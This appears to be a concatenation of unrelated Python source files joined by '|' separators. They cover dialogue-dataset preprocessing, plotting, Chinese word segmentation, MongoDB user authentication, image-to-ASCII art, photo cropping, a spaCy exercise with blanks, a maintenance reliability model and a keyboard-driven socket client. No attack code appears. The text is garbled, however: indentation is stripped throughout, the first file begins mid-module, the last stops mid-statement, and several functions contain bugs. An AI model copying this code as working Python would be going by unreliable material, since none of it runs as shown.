def preprocessing_dataset(index: int, scenario, is_like_dn: bool):
dialogue = ' '.join([token for token in scenario[3] if token != '<eos>'])
value = [int(val) for val in scenario[0][1::2]]
counter_value = [int(val) for val in scenario[1][1::2]]
normed_value = np.array(value) / np.sum(value)
normed_counter_value = np.array(counter_value) / np.sum(counter_value)
values = np.concatenate((normed_value, normed_counter_value)).tolist()
flag = 0
if ('<disagree>' in scenario[2]) or ('<no_agreement>' in scenario[2]):
flag = 1
score_you, score_them = 0., 0.
if is_like_dn is False:
return [index, dialogue, flag, score_you, score_them, score_them + score_you, values]
else:
return [dialogue, flag, score_you, score_them, score_them + score_you, values]
item_count = [(int(num_item.split('=')[1])) for num_item in scenario[2]]
score_you = np.dot(value, item_count[:3])
score_them = np.dot(counter_value, item_count[3:])
# debug:
# print(f'{score_you} : {score_them}')
if is_like_dn is False:
return [index, dialogue, flag, score_you, score_them, score_them + score_you, values]
else:
return [dialogue, flag, score_you, score_them, score_them + score_you, values]
dataset = []
text = path.read_text('utf-8').split('\n')
for index, line in enumerate(text):
tokens = line.strip().split() # split into elements
scenario = []
# for empty list
if tokens == []:
continue
for tag in ['input', 'partner_input', 'output', 'dialogue']:
scenario.append(get_tag(tokens, tag))
# discard unreached an agreement dialogue
if '<disconnect>' in scenario[2]:
continue
scenario = preprocessing_dataset(index, scenario, is_like_dn)
dataset.append(scenario)
if is_like_dn is False:
dataset = remove_duplication(dataset)
dataset = length_regulator(dataset, ratio=ratio)
print(f'{path.name}: {len(dataset)} scenarios.')
df = pd.DataFrame(dataset, columns=['raw_text', 'text', 'flag'])
df.to_csv(sys.argv[2], index=False)
if __name__ == '__main__':
if len(sys.argv) <= 2:
raise Exception("Please give a valid dataset path!")
path = sys.argv[1]
r_path = Path(path)
load_negotiation(r_path, is_like_dn=False, ratio=1.0)
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
"""
This module provides class and methods for plotting curves.
"""
from typing import Union, Optional
import matplotlib.pyplot as plt
import numpy as np
def plot_curve(y: Union[list,tuple,'np.array'],
x: Optional[Union[list,tuple,'np.array']] = None,
periodic_x: Optional[Union[float,tuple,list]] = None,
relative_x: Optional[Union[int, str]] = None,
xlabel: str = '',
relative_y: Optional[Union[int, str]] = None,
ylabel: str = '',
highlight_index: Optional[int] = None,
ax: 'matplotlib.pyplot.axes' = None,
):
"""
An universal function to plot the energy curve.
Args:
y (list-like): A list-like object to be plotted as y variable.
x (list-like): A list-like object to be plotted as y variable.
"""
# Modify x variables
if relative_x != None:
if isinstance(relative_x, int):
# Reference based on the index
try:
x_ref = x[relative_x]
except KeyError:
raise ValueError('Invalid x_baseline. If an int is given, it should be within'
'the range of indices.')
elif isinstance(relative_x, str):
if relative_x == 'min':
x_ref = np.min(x)
elif relative_x == 'max':
x_ref = np.max(x)
else:
raise NotImplementedError('The relative_x method is not supported.')
x = np.array(x) - x_ref
if periodic_x:
if isinstance(periodic_x, (int, float)):
# the periodic range is 0 to the value
periodic_x = [0, periodic_x]
try:
periodicity = periodic_x[1] - periodic_x[0]
except:
raise ValueError(f'Invalid periodic_x value {periodic_x}')
too_small = x < periodic_x[0]
too_large = x > periodic_x[1]
while any(too_small) or any(too_large):
x[too_small] += periodicity
x[too_large] -= periodicity
too_small = x < periodic_x[0]
too_large = x > periodic_x[1]
# Modify y variables
if relative_y != None:
if isinstance(relative_y, int):
# Reference based on the index
try:
y_ref = y[relative_y]
except KeyError:
raise ValueError('Invalid relative_y. If an int is given, it should be within'
'the range of indices.')
elif isinstance(relative_y, str):
if relative_y == 'min':
y_ref = np.min(y)
elif relative_y == 'max':
y_ref = np.max(y)
else:
raise NotImplementedError('The x_baseline method is not supported.')
y = np.array(y) - y_ref
ax = ax or plt.axes()
if x is None:
x = np.arange(y.shape[0])
ax.plot(x, y, '.-')
ax.set(xlabel=xlabel, ylabel=ylabel)
if highlight_index and highlight_index < x.shape[0]:
ax.plot(x[highlight_index], y[highlight_index], 'ro')
return ax
|
#!/bin/python3
import sys
PENALTY_THUNDERBOLT = 2
PENALTY_JUMP = 1
e = 100
n, k = map(int, input().split())
c = tuple(map(int, input().split()))
i = 0
while True:
if c[i]:
e -= PENALTY_THUNDERBOLT
i = (i + k) % n
e -= PENALTY_JUMP
if i == 0:
break
print(e)
|
# -*- coding: utf-8 -*-
"""Module for constructing <b> tag."""
from __future__ import absolute_import
from ...templates.html.tags import bold
class B(object):
"""Class for constructing bold tag.
Args:
text (str): Bold tag text. (Ex. <b>text</b>)
.. versionadded:: 0.1.0
.. versionchanged:: 0.2.0
Renamed the method construct_tag to construct.
"""
def __init__(self, text=None):
self.tag = 'b'
self.values = {'text': text}
def construct(self):
"""Returns the constructed bold tag <b></b>."""
return bold.render(self.values)
|
#coding=utf-8
"""
Chinese word segmentation algorithm without corpus
Author: 段凯强
Reference: http://www.matrix67.com/blog/archives/5044
"""
from __future__ import division, print_function
import re
import time
from .probability import entropyOfList
from .sequence import genSubparts, genSubstr
def indexOfSortedSuffix(m_data, max_word_len):
"""
Treat a suffix as an index where the suffix begins.
Then sort these indexes by the suffixes.
"""
indexs = {}
for i in range(len(m_data)):
sl = len(m_data[i]) + 1
indexs[i] = []
for j in range(sl):
indexs[i].append(j, min(sl,max_word_len+j+1))
# for k in range(j+1, min(sl,max_word_len+j+1)):
# indexs[i].append((j,k))
return indexs
class WordInfo(object):
"""
Store information of each word, including its freqency, left neighbors and right neighbors
"""
def __init__(self, text):
super(WordInfo, self).__init__()
self.text = text
self.freq = 0.0
self.left = []
self.right = []
self.aggregation = 0
self.entropy = 0
def update(self, left, right):
"""
Increase frequency of this word, then append left/right neighbors
@param left a single character on the left side of this word
@param right as left is, but on the right side
"""
self.freq += 1
if left: self.left.append(left)
if right: self.right.append(right)
def compute(self, length):
"""
Compute frequency and entropy of this word
@param length length of the document for training to get words
"""
self.freq /= length
# self.left = entropyOfList(self.left)
# self.right = entropyOfList(self.right)
self.entropy = min(entropyOfList(self.left), entropyOfList(self.right))
def computeAggregation(self, words_dict):
"""
Compute aggregation of this word
@param words_dict frequency dict of all candidate words
"""
parts = genSubparts(self.text)
if len(parts) > 0:
self.aggregation = min(map(
lambda p: self.freq/words_dict[p[0]].freq/words_dict[p[1]].freq,
parts
))
class WordSegment(object):
"""
Main class for Chinese word segmentation
1. Generate words from a long enough document
2. Do the segmentation work with the document
"""
# if a word is combination of other shorter words, then treat it as a long word
L = 0
# if a word is combination of other shorter words, then treat it as the set of shortest words
S = 1
# if a word contains other shorter words, then return all possible results
ALL = 2
def __init__(self, doc, max_word_len=5, min_freq=0.00005, min_entropy=2.0, min_aggregation=50):
super(WordSegment, self).__init__()
t = time.time()
self.max_word_len = max_word_len
self.min_freq = min_freq
self.min_entropy = min_entropy
self.min_aggregation = min_aggregation
self.word_infos = self.genWords(doc)
# Result infomations, i.e., average data of all words
word_count = len(self.word_infos)
self.avg_len = sum(map(lambda w: len(w.text), self.word_infos))/word_count
self.avg_freq = sum(map(lambda w: w.freq, self.word_infos))/word_count
# self.avg_left_entropy = sum(map(lambda w: w.left, self.word_infos))/word_count
# self.avg_right_entropy = sum(map(lambda w: w.right, self.word_infos))/word_count
self.avg_aggregation = sum(map(lambda w: w.aggregation, self.word_infos))/word_count
# Filter out the results satisfy all the requirements
filter_func = lambda v: len(v.text) > 1 and v.aggregation > self.min_aggregation and\
v.freq > self.min_freq and v.entropy > self.min_entropy
self.word_with_freq = map(lambda w: (w.text, w.freq), filter(filter_func, self.word_infos))
self.words = list(map(lambda w: w[0], self.word_with_freq))
print('total_time:%s seconds'%round(time.time() - t, 3))
def wash_data(self, raw_data):
pattern = re.compile(u'[\\s\\d,.<>/?:;\'\"[\\]{}()\\|~!@#$%^&*\\-_=+a-zA-Z,。《》、?:;“”‘’{}【】()…¥!—┄-]+')
doc = re.sub(pattern, ' ', raw_data).split()
return doc
def genWords(self, doc):
"""
Generate all candidate words with their frequency/entropy/aggregation informations
@param doc the document used for words generation
"""
doc = self.wash_data(doc)
# suffix_indexes = indexOfSortedSuffix(doc, self.max_word_len)
word_cands = {}
for line in doc:
sl = len(line)+1
for j in range(sl):
left = line[j-1]
maxLen = self.max_word_len+j+1
for k in range(j+1, min(maxLen, sl)):
word = line[j:k]
right = line[k:k+1]
if word not in word_cands:
word_cands[word] = WordInfo(word)
word_cands[word].update(left, right)
# compute frequency and neighbors
# for i, indexes in suffix_indexes.items():
# for index in indexes:
# word = doc[i][index[0]:index[1]]
# if word not in word_cands:
# word_cands[word] = WordInfo(word)
# word_cands[word].update(doc[i][index[0] - 1:index[0]], doc[i][index[1]:index[1] + 1])
# compute probability and entropy
length = len(''.join(doc))
for k in word_cands:
word_cands[k].compute(length)
# compute aggregation of words whose length > 1
values = sorted(word_cands.values(), key=lambda x: len(x.text))
for v in values:
if len(v.text) == 1: continue
v.computeAggregation(word_cands)
return sorted(values, key=lambda v: v.freq, reverse=True)
def segSentence(self, sentence, method=ALL):
"""
Segment a sentence with the words generated from a document
@param sentence the sentence to be handled
@param method segmentation method
"""
i = 0
res = []
while i < len(sentence):
if method == self.L or method == self.S:
j_range = range(self.max_word_len, 0, -1) if method == self.L else list(range(2, self.max_word_len + 1)) + [1]
for j in j_range:
if j == 1 or sentence[i:i + j] in self.words:
res.append(sentence[i:i + j])
i += j
break
else:
to_inc = 1
for j in range(2, self.max_word_len + 1):
if i + j <= len(sentence) and sentence[i:i + j] in self.words:
res.append(sentence[i:i + j])
if to_inc == 1: to_inc = j
if to_inc == 1: res.append(sentence[i])
i += to_inc
return res
if __name__ == '__main__':
doc = u'十四是十四四十是四十,,十四不是四十,,,,四十不是十四'
ws = WordSegment(doc, max_word_len=2, min_aggregation=1.2, min_entropy=0.4)
print( ' '.join(map(lambda w: '%s:%f'%w, ws.word_with_freq)))
print(' '.join(ws.words))
print(' '.join(ws.segSentence(doc)))
print('average len: ', ws.avg_len)
print('average frequency: ', ws.avg_freq)
print('average left entropy: ', ws.avg_left_entropy)
print('average right entropy: ', ws.avg_right_entropy)
print('average aggregation: ', ws.avg_aggregation)
|
from GA import GARuck
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parse_args = "pop_size,n_generations,n_agents,n_timesteps,mut_tile_size,mut_tile_no," \
"cluster_node,run_notes,run_name," \
"log_interval,save_interval"
parse_args = parse_args.split(",")
for parse_arg in parse_args:
parser.add_argument(parse_arg)
args = parser.parse_args()
pop_size = int(args.pop_size)
n_generations = int(args.n_generations)
n_agents = int(args.n_agents)
n_timesteps = int(args.n_timesteps)
mut_tile_size = int(args.mut_tile_size)
mut_tile_no = int(args.mut_tile_no)
run_notes = args.run_notes
run_name = args.run_name
cluster_node = args.cluster_node
log_interval = int(args.log_interval)
save_interval = int(args.save_interval)
using_wandb = True
GARuck.train(pop_size, n_generations, n_agents,
n_timesteps, mut_tile_size, mut_tile_no,
using_wandb, log_interval, save_interval,
cluster_node,
run_notes, run_name)
# pop_size,n_generations,n_agents,n_timesteps,mut_tile_size,mut_tile_no
# cluster_node,run_notes,run_name
# log_interval,save_interval
# python3 ga_train.py 64 100 5 500 4 1 -1 "Test" ""
|
def pesho():
print('Pesho')
print('Gosho')
pesho()
|
from collections import namedtuple
from pymongo import MongoClient
from cryptography.fernet import Fernet
from karura.env import get_database_uri, get_private_key, kintoneEnv
class DatabaseAPI():
USER_COLLECTION = "karura_user"
def __init__(self, database_uri="", alternative_db=""):
self.database_uri = database_uri if database_uri else get_database_uri()
self._alternative_db = alternative_db
self._database = None
self.__client = None
def connect(self):
self._get_database()
def _get_database(self):
if self._database is not None:
return self._database
else:
self.__client = MongoClient(self.database_uri, serverSelectionTimeoutMS=2)
db = self.__client.get_default_database()
if self._alternative_db:
db = self.__client[self._alternative_db]
if not db:
raise Exception("Cannot connect to the database. Please configure database_uri.")
self._database = db
return self._database
def __authentication_parameter_check(self, domain, user, password):
if not domain:
raise Exception("domain is not specified in register the user.")
if not user:
raise Exception("user is not specified in register the user.")
if not password:
raise Exception("user is not specified in register the user.")
if "@" in user:
raise Exception("user name with '@' is not allowed")
# see ref: login security on cybozu
# https://help.cybozu.com/ja/general/admin/passwordpolicy.html
if len(user) <= 3:
raise Exception("user's string length is too short.")
if len(password) <= 3:
raise Exception("password's string length is too short.")
elif len(password) > 72:
raise Exception("password's string length is too long.") # for bcrypt
return True
def __encrypt(self, secret_str):
key = get_private_key()
f = Fernet(key)
encoded = f.encrypt(secret_str.encode("utf-8"))
return encoded
def __decrypt(self, encoded_str):
key = get_private_key()
f = Fernet(key)
decoded = f.decrypt(encoded_str)
return decoded.decode("utf-8")
def __make_user_key(self, domain, user):
return user + "@" + domain
@classmethod
def key_split(cls, key):
user, domain = key.rsplit("@")
return user, domain
@classmethod
def key_to_dict(cls, key):
user, domain = cls.key_split(key)
return {"user": user, "domain": domain}
def register_user(self, domain, user, password):
self.__authentication_parameter_check(domain, user, password)
db = self._get_database()
user_db = db[self.USER_COLLECTION]
key = self.__make_user_key(domain, user)
if user_db.find_one({"key": key}) is not None:
raise Exception("The user already exist.")
password = self.__encrypt(password)
result = user_db.insert_one({"key": key, "password": password, "domain": domain})
if result and result.inserted_id:
return user_db.find_one({"_id": result.inserted_id})
else:
raise Exception("Could not register the user.")
def authenticate_user(self, domain, user, password):
self.__authentication_parameter_check(domain, user, password)
db = self._get_database()
user_db = db[self.USER_COLLECTION]
key = self.__make_user_key(domain, user)
registered = user_db.find_one({"key": key})
if registered is not None and password == self.__decrypt(registered["password"]):
return registered
else:
raise Exception("Authentication of user failed.")
def delete_user(self, domain, user, password):
registered = self.authenticate_user(domain, user, password)
if not registered:
raise Exception("Faild to delete the user.")
else:
db = self._get_database()
user_db = db[self.USER_COLLECTION]
result = user_db.delete_one({"_id": registered["_id"]})
return result.deleted_count == 1
def change_user_password(self, domain, user, old_password, new_password):
self.__authentication_parameter_check(domain, user, old_password)
self.__authentication_parameter_check(domain, user, new_password)
if old_password == new_password:
raise Exception("old_password and new_password is same.")
registered = self.authenticate_user(domain, user, old_password)
result = False
if registered is not None:
db = self._get_database()
user_db = db[self.USER_COLLECTION]
_new_password = self.__encrypt(new_password)
result = user_db.update_one({"_id": registered["_id"]}, {"$set": {"password": _new_password}})
result = (result.modified_count == 1)
if not result:
raise Exception("Change password is failed")
def get_kintone_env(self, domain):
try:
db = self._get_database()
user_db = db[self.USER_COLLECTION]
registered = user_db.find_one({"domain": domain})
if not registered:
return None
user, domain = self.key_split(registered["key"])
env = kintoneEnv(domain, user, self.__decrypt(registered["password"]))
return env
except Exception as ex:
return None
def close(self, with_drop=False):
if self._database is not None:
if with_drop:
self.__client.drop_database(self._database.name)
self.__client.close()
self.__database = None
|
import argparse
from PIL import Image, ImageDraw, ImageFont
CHARS = [chr(i) for i in range(32, 127)]
def main():
args = parse_args()
fnt = ImageFont.truetype('~/Library/Fonts/Hack Bold Nerd Font Complete.ttf', args.font_size)
font_w, font_h = get_font_size(args.font_size, fnt)
char_density = generate_char_density(fnt, (font_w, font_h))
regions = get_regions(args.image, font_w, font_h)
map_regions_to_chars(char_density, regions)
def map_regions_to_chars(char_density, regions):
char_density_list = sorted(char_density.items(), key=lambda x: x[1])
max_char_density = char_density_list[-1][1]
max_region_density = 0
for i in range(len(regions)):
for j in range(len(regions[i])):
regions[i][j] = sum(map(sum, regions[i][j].getdata()))
max_region_density = max(max_region_density, regions[i][j])
density_scale = max_char_density / max_region_density
output = []
for r_density in regions:
for r_d in r_density:
output.append(find_closest_char(char_density_list, r_d, density_scale))
output.append('\n')
print(''.join(output))
def find_closest_char(char_density_list, density, density_scale):
target_density = density * density_scale
char = min(char_density_list, key=lambda x: abs(x[1]-target_density))
return char[0]
def get_regions(image, font_w, font_h):
with Image.open(image) as im:
im = im.convert('LA')
img_w, img_h = im.size
new_img = Image.new('RGB', im.size)
h = 0
w = 0
regions = []
while h <= img_w:
region_list = []
regions.append(region_list)
while w <= img_w:
region = im.crop((w, h, w+font_w, h+font_h))
region_list.append(region)
w += font_w
w = 0
h += font_h
return regions
def generate_char_density(fnt, size):
char_density = {}
for c in CHARS:
img = Image.new('RGB', size, color='white')
d = ImageDraw.Draw(img)
d.text((0, 0), c, font=fnt, fill='black')
char_density[c] = sum(map(sum, img.getdata()))
return char_density
def get_font_size(font_size, fnt):
d = ImageDraw.Draw(Image.new('RGB', (font_size, font_size)))
sizes = [d.textsize(c, font=fnt) for c in CHARS]
max_w = max(sizes, key=lambda s: s[0])[0]
max_h = max(sizes, key=lambda s: s[1])[1]
return (max_w, max_h)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('image', help='Image file to turn into ASCII')
parser.add_argument('--font-size', default=15, type=int, help='Font size')
return parser.parse_args()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# from trimming import Trimming
from photo import Photo
# from ssdnet import MultiBoxEncoder, SSD300, SSD512, SSD300_v2, SSD512_v2, preproc_for_test
# from common.logger import get_task_logger
from datetime import datetime
from PIL import Image
import numpy as np
import sys
import os
import time
# logger = get_task_logger("trimming")
class Crop():
"""
検出オブジェクトをCropした画像を取得するクラス
"""
def __init__(self, options):
self.options = options
# ssdモデルのロード
# self.models = self.load_ssdmodel()
self.n_skip = 0
self.n_data = 0
# self.ssd_parts_scores = {} # dummy: 最新実装に合わせるため
def detect_for(self, clsname):
"""
予め全モデルで予測を行い、
clsnameで指定されたオブジェクトのみを出力する。
"""
# if (photo):
# self.photo = photo
# if (roicls):
# # roiclsで人体のいずれかの部位に限定
# roiobjs = []
# roi_bboxes = self.predict_by("body").get(roicls, [])
# for roi_bbox in roi_bboxes:
# roiobjs.append(roi_bbox)
# else:
# # 写真全体をROIとする。roi=Noneはself.photoがオリジナル画像として扱われる。
# roiobjs = [None]
roiobjs = [None]
allobjs = {}
for roi in roiobjs:
# ROIの単位で検出
roidicts = {}
for mdl in self.get_modelinfo():
# モデル別に検出(org画像の座標系でbbox出力)
objs = self.predict_by(mdl["name"], roi=roi)
roidicts.update(objs)
# 全ROIの検出結果をクラス単位でマージ
for k, v in roidicts.items():
if not (k in allobjs):
allobjs[k] = v
else:
allobjs[k] += v
# clsnameで指定されたクラスのbboxを出力
return allobjs.get(clsname, [])
def detect_for2(self, clsname, roicls=None, photo=None, outroi=False):
"""
予め全モデルで予測を行い、
clsnameで指定されたオブジェクトのみを出力する。
"""
if (photo):
self.photo = photo
if (roicls):
# roiclsで人体のいずれかの部位に限定
roiobjs = self.predict_by("body").get(roicls, [])
else:
# 写真全体をROIとする。roi=Noneはself.photoがオリジナル画像として扱われる。
roiobjs = [None]
allobjs, outrois = [], []
for roi in roiobjs:
# ROIの単位で検出
roidicts = {}
for mdl in self.get_modelinfo():
# モデル別に検出(org画像の座標系でbbox出力)
objs = self.predict_by(mdl["name"], roi=roi)
roidicts.update(objs)
if ((clsname in objs) and (len(objs[clsname]) > 0)):
# 対象クラスオブジェクトが存在する場合のみ、元となったROIを保存
outrois.append(roi)
# 当該roiから複数のclsnameに関する対象オブジェクトが抽出された場合にも備え、配列を要素とする
allobjs.append(objs[clsname])
if (outroi):
# clsnameで指定されたクラスのbboxと、そのroi領域を出力
return allobjs, outrois
else:
# clsnameで指定されたクラスのbboxを出力
return allobjs
def crop_image(self, img, bbox, allow_zero=False):
x, y, w, h = bbox
if (not allow_zero) and ((x <= 0) or (y <= 0)):
return None
elif (allow_zero) and ((x < 0) or (y < 0)):
return None
croped_img = self.cut_rect(img, *bbox)
if (self.options["pil"]):
croped_img = self.cv2pil(croped_img) # PIL形式に変換
return croped_img
def crop_images(self, img, bboxes):
"""
bboxesで指定されたbboxに対応した画像を出力する。
"""
logger.info("+++ [crop_images] start +++")
images = []
for crop_i, bbox in enumerate(bboxes):
_x, _y, _w, _h = bbox
logger.info("[crop_images] bbox: %s, %s, %s, %s" %
(_x, _y, _w, _h))
croped_img = self.crop_image(img, bbox)
if (croped_img is None):
logger.info("[crop_images] <skip> invalid bbox:", bbox)
continue
images.append((crop_i, croped_img))
logger.info("--- [crop_images] end ---")
return images
def saveimgs(self, images, img_fpath, odir):
"""
img_fpathから抽出したimagesをodirに保存する
"""
for i, (crop_i, img) in enumerate(images):
fpath, ext = os.path.splitext(img_fpath)
bn = os.path.basename(fpath)
fn = "%s_%d%s" % (bn, i+1, ext)
if not (os.path.exists(odir)):
os.makedirs(odir)
self.saveimg(img, odir, fn)
def save_crop_images(self, img_fpath):
# 写真のロード
degree = 0 # 回転させない
self.photo = Photo(img_fpath, 0, 0, {"rotate": degree})
bboxes = self.detect_for(self.options["class"])
if (self.options["n"] and (len(bboxes) > self.options["n"])):
# 単身以外は除外
self.n_skip += 1
print("x [skip] #heads = %d: %s" % (len(bboxes), img_fpath))
return
# 修正後画像がある場合のみ画像生成
bn = os.path.basename(img_fpath)
mod_fpath = None
if (self.options["mod"]):
mod_fpath = os.path.join(self.options["mod"], bn)
if not (os.path.isfile(mod_fpath)):
self.n_skip += 1
print("x [skip] %s does not exists..." % (mod_fpath))
return
self.n_data += 1
# ORG画像(反射あり)から顔画像抽出
images = self.crop_images(self.photo.src, bboxes)
if (mod_fpath):
# modified画像(反射あり)から顔画像抽出
modimg = self.read_image(mod_fpath)
mh, mw = modimg.shape[:2]
if ((self.photo.w != mw) or (self.photo.h != mh)):
print("x [Error] no same file-size pair: %s " % (mod_fpath))
return
mod_images = self.crop_images(modimg, bboxes)
# resize
if (self.options["shape"]):
h, w = self.options["shape"].split("x")
if not (h.isdigit() and w.isdigit()):
print(
"[Error] no digits for --shape option. needs HEIGHTxWIDTH format...")
return
# アスペクト比維持してリサイズし、余った領域をpadding
images = self.resize_images(images, (int(h), int(w)),
pad=self.options["pad"], blur=self.options["blur"],
aspect=self.options["pad"])
if (mod_fpath):
mod_images = self.resize_images(mod_images, (int(h), int(w)),
pad=self.options["pad"], blur=self.options["blur"],
aspect=self.options["pad"])
# 修正前後の画像をそれぞれオブジェクト別にファイル書き出し
self.saveimgs(images, img_fpath, self.options["output_org"])
if (mod_fpath):
self.saveimgs(mod_images, mod_fpath, self.options["output_mod"])
def run(self):
"""
バッチメイン
"""
print("options:", end=' ')
print(self.options)
images = self.options["org"]
if (os.path.isfile(images)):
# ファイル指定の場合
images = [images]
elif (os.path.isdir(images)):
# ディレクトリ指定の場合
images = self.get_files(
images, ext=[".jpg", ".jpeg", ".png", ".gif"])
for i, img_fpath in enumerate(images):
if (os.path.isfile(img_fpath)):
print("[%d] %s" % (i, img_fpath))
self.save_crop_images(img_fpath)
else:
print("[%d] <SKIP> no file: %s" % (i, img_fpath))
print("#n_data: %d, #n_skip: %d" % (self.n_data, self.n_skip))
|
import spacy
from spacy.language import Language
# Definiere die benutzerdefinierte Komponente
@Language.component("length_component")
def length_component_function(doc):
# Berechne die Länge des Dokuments
doc_length = ____
print(f"Dieses Dokument ist {doc_length} Tokens lang.")
# Gib das Doc zurück
____
# Lade die kleine deutsche Pipeline
nlp = spacy.load("de_core_news_sm")
# Füge die Komponente am Anfang der Pipeline hinzu und drucke die Namen der Komponenten
____.____(____, ____=____)
print(nlp.pipe_names)
# Verarbeite einen Text
doc = ____
|
# Copyright 2020, Battelle Energy Alliance, LLC
# ALL RIGHTS RESERVED
"""
Created on May 1 2020
@author: mandd,wangc
"""
#External Modules------------------------------------------------------------------------------------
import numpy as np
import numpy.ma as ma
#External Modules End--------------------------------------------------------------------------------
#Internal Modules------------------------------------------------------------------------------------
from utils import mathUtils as utils
from utils import InputData, InputTypes
from .MaintenanceBase import MaintenanceBase
#Internal Modules End--------------------------------------------------------------------------------
class PMModel(MaintenanceBase):
"""
Basic reference for Preventive Maintenance (PM) modeling
Reference:
D. Kancev, M. Cepin 148
Evaluation of risk and cost using an age-dependent unavailability modelling of test and maintenance for standby components
Journal of Loss Prevention in the Process Industries 24 (2011) pp. 146-155.
"""
@classmethod
def getInputSpecification(cls):
"""
Collects input specifications for this class.
@ In, cls, class instance
@ Out, inputSpecs, InputData, specs
"""
typeEnum = InputTypes.makeEnumType('PMType', 'PMTypeType', ['standby','operating'])
inputSpecs = super(PMModel, cls).getInputSpecification()
inputSpecs.description = r"""
Preventive maintenance reliability models
"""
inputSpecs.addSub(InputData.parameterInputFactory('type', contentType=typeEnum, descr='Type of SSC considered: stand-by or operating'))
inputSpecs.addSub(InputData.parameterInputFactory('rho', contentType=InputTypes.InterpretedListType, descr='Failure probability on demand'))
inputSpecs.addSub(InputData.parameterInputFactory('Tpm', contentType=InputTypes.InterpretedListType, descr='Time required to perform PM activities'))
inputSpecs.addSub(InputData.parameterInputFactory('Tr', contentType=InputTypes.InterpretedListType, descr='Average repair time'))
inputSpecs.addSub(InputData.parameterInputFactory('Tt', contentType=InputTypes.InterpretedListType, descr='Average test duration'))
inputSpecs.addSub(InputData.parameterInputFactory('Lambda',contentType=InputTypes.InterpretedListType, descr='Component failure rate'))
inputSpecs.addSub(InputData.parameterInputFactory('Tm', contentType=InputTypes.InterpretedListType, descr='Preventive maintenance interval'))
inputSpecs.addSub(InputData.parameterInputFactory('Ti', contentType=InputTypes.InterpretedListType, descr='Surveillance test interval'))
return inputSpecs
def __init__(self):
"""
Constructor
@ In, None
@ Out, None
"""
super().__init__()
# Component type
self.type = None
self.rho = None
self.Tpm = None
self.Tr = None
self.Tt = None
self.Lambda = None
self.Tm = None
self.Ti = None
def _handleInput(self, paramInput):
"""
Function to read the portion of the parsed xml input that belongs to this specialized class
and initialize some stuff based on the inputs got
@ In, paramInput, InputData.ParameterInput, the parsed xml input
@ Out, None
"""
super()._handleInput(paramInput)
for child in paramInput.subparts:
if child.getName().lower() == 'type':
self.type = child.value
if child.getName().lower() == 'rho':
self.setVariable('rho', child.value)
if child.getName().lower() == 'tpm':
self.setVariable('Tpm', child.value)
if child.getName().lower() == 'tr':
self.setVariable('Tr', child.value)
if child.getName().lower() == 'tt':
self.setVariable('Tt', child.value)
if child.getName().lower() == 'lambda':
self.setVariable('Lambda', child.value)
if child.getName().lower() == 'tm':
self.setVariable('Tm', child.value)
if child.getName().lower() == 'ti':
self.setVariable('Ti', child.value)
def initialize(self, inputDict):
"""
Method to initialize this plugin
@ In, inputDict, dict, dictionary of inputs
@ Out, None
"""
super().initialize(inputDict)
def _availabilityFunction(self, inputDict):
"""
Method to calculate component availability
@ In, inputDict, dict, dictionary of inputs
@ Out, availability, float, component availability
"""
if self.type == 'standby':
availability = 1.0 - self.standbyModel(self.rho, self.Ti, self.Tr, self.Tt, self.Tpm, self.Tm, self.Lambda)
else:
availability = 1.0 - self.operatingModel(self.Tr, self.Tpm, self.Tm, self.Lambda)
return availability
def _unavailabilityFunction(self, inputDict):
"""
Method to calculate component unavailability
@ In, inputDict, dict, dictionary of inputs
@ Out, availability, float, component unavailability
"""
if self.type == 'standby':
unavailability = self.standbyModel(self.rho, self.Ti, self.Tr, self.Tt, self.Tpm, self.Tm, self.Lambda)
else:
unavailability = self.operatingModel(self.Tr, self.Tpm, self.Tm, self.Lambda)
return unavailability
def standbyModel(self, rho, Ti, Tr, Tt, Tpm, Tm, lamb):
"""
Method to calculate unavailability for a component in a stand-by configuration
@ In, rho, float, failure probability per demand
@ In, Ti, float, surveillance test interval
@ In, Tr, float, mean time to repair
@ In, Tt, float, test duration
@ In, Tpm, float, mean time to perform preventive maintenance
@ In, Tm, float, preventive maintenance interval
@ In, lamb,float, component failure rate
@ Out, unavailability, float, component unavailability
"""
u = rho + 0.5*lamb*Ti + Tt/Ti + (rho+lamb*Ti)*Tr/Ti + Tpm/Tm
return u
def operatingModel(self, Tr, Tpm, Tm, lamb):
"""
Method to calculate unavailability for a component which is continuosly operating
@ In, Tr, float, mean time to repair
@ In, Tpm, float, mean time to perform preventive maintenance
@ In, Tm, float, preventive maintenance interval
@ In, lamb,float, component failure rate
@ Out, unavailability, float, component unavailability
"""
u = lamb*Tr/(1.0+lamb*Tr) + Tpm/Tm
return u
|
from django.contrib import admin
from .models import Employees
admin.site.register(Employees)
|
import socket
import select
import sys
import numpy as np
import time
from capnctrl import cap, ctrl
HEADER_LENGTH = 10
IP = ""
PORT = 1234
my_username = 'tutor'
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((IP, PORT))
client_socket.setblocking(False)
username = my_username.encode('utf-8')
username_header = f"{len(username):<{HEADER_LENGTH}}".encode('utf-8')
client_socket.send(username_header + username)
my_username2 = 'netStart'
client_socket2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket2.connect((IP, PORT))
client_socket2.setblocking(False)
username2 = my_username2.encode('utf-8')
username_header2 = f"{len(username2):<{HEADER_LENGTH}}".encode('utf-8')
client_socket2.send(username_header2 + username2)
steering = 0
target = 0
m2s = {'a':-0.1, 'd':0.1}
training = False
key = 'f'
message = "True"
while True:
key = cap.keyboard()
"""
try:
# receive things
username_header = client_socket.recv(HEADER_LENGTH)
if not len(username_header):
print("connection closed by the server")
sys.exit()
username_length = int(username_header.decode('utf-8'))
username = client_socket.recv(username_length).decode('utf-8')
if username == 'SERVER':
message_header = client_socket.recv(HEADER_LENGTH)
message_length = int(message_header.decode('utf-8'))
message = client_socket.recv(message_length).decode('utf-8')
except :
pass
"""
for i in range(len(key)):
try:
if key[i] == 'q':
target = target * 0.6
training = True
elif key[i] == 'e':
"""
if training:
out_message = 'net'.encode('utf-8')
out_message_header = f"{len(out_message):<{HEADER_LENGTH}}".encode('utf-8')
client_socket.send(out_message_header + out_message)
"""
target = 0
training = False
else:
#training = True
target = target + m2s[key[i]]
except:
pass
target = np.max([-0.5, target])
target = np.min([0.5, target])
steering = 0.8*steering + 0.2*target
steering = np.max([-0.5, steering])
steering = np.min([0.5, steering])
if training:
out_message = str(steering).encode('utf-8')
out_message_header = f"{len(out_message):<{HEADER_LENGTH}}".encode('utf-8')
